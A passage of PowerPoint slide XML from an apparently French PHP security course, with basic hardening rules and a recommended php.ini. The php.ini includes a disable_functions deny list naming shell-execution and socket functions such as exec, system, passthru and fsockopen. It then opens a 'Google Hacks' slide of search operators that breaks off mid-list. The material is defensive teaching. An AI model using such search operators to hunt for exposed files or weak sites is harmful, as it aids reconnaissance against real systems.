          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Quelques règles simples </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Eviter les extensions .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> et similaires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Préférer l’extension </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inc.php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Ne pas autoriser la navigation dans son arborescence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Apache (Option -Indexes) si autorisé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ou créer "index.html" dans chaque répertoire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Stocker les fichiers de données hors du web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Hors du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>DocumentRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, pas d’accès web direct.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Privilèges utilisateurs réduits à l’essentiel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ne jamais faire confiance aux utilisateurs! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>obscurity</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Et surtout, ANTICIPER </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Configuration recommandée du  (php.ini)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Gestion des erreurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>error_reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = E_ALL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>display_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>log_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>variables_order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = "GPCS"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>register_argc_argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>magic_quotes_runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>session.save_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = /var/apache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>/sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>session.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>use_cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>session.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>use_only_cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>session.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>auto_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>session.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>cookie_lifetime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = 7200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>session.gc_probability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = 0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Configuration recommandée du  (php.ini) Suite</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>disable_functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>exec,system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>proc_open,passthru,fsockopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>ftp_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>ftp_ssl_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>dl_open,mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>enable_dl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>open_basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = /home/site/html:/home/site/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>includes</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>extension_dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>nowhere</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>include_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>file_uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Configuration recommandée du  (php.ini) Suite</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une fois la configuration achevée, regarder ce qui ne marche plus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>La plupart des applications relativement récentes supportent bien le traitement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Essayer de faire modifier les applications et pas l'inverse</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Google Hacks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>site:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> permet de rechercher les pages web d’un site spécifique. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>site:blogdumoderateur.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> liste uniquement les pages web du blog du Modérateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> limite la recherche au type de fichier spécifié. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>filetype:PDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> permet de rechercher uniquement les documents PDF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>cache:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> permet de visualiser la page spécifiée telle qu’elle est conservée dans le cache Google. Exemple : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cache:blogdumoderateur.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> ajouter une URL à la suite de l’opérateur pour connaître les pages similaires. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>related:google.fr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> permet de découvrir d’autres moteurs de recherche.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour obtenir la définition d’un terme. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>define:internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> présente la définition d’Internet selon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Wikipédia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>. D’autres sources sont disponibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>allintext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> recherche un mot uniquement dans le body d’un site. Cette fonctionnalité exclue notamment le titre de la page pour la recherche. Exemple : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>allintext:modérateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>intext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> même principe, pour les phrases complètes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>allintitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour rechercher uniquement dans les titres des pages (balise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>intitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> même principe, pour rechercher une phrase complète.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>allinurl</a:t>
            </a:r>
            <a:r>
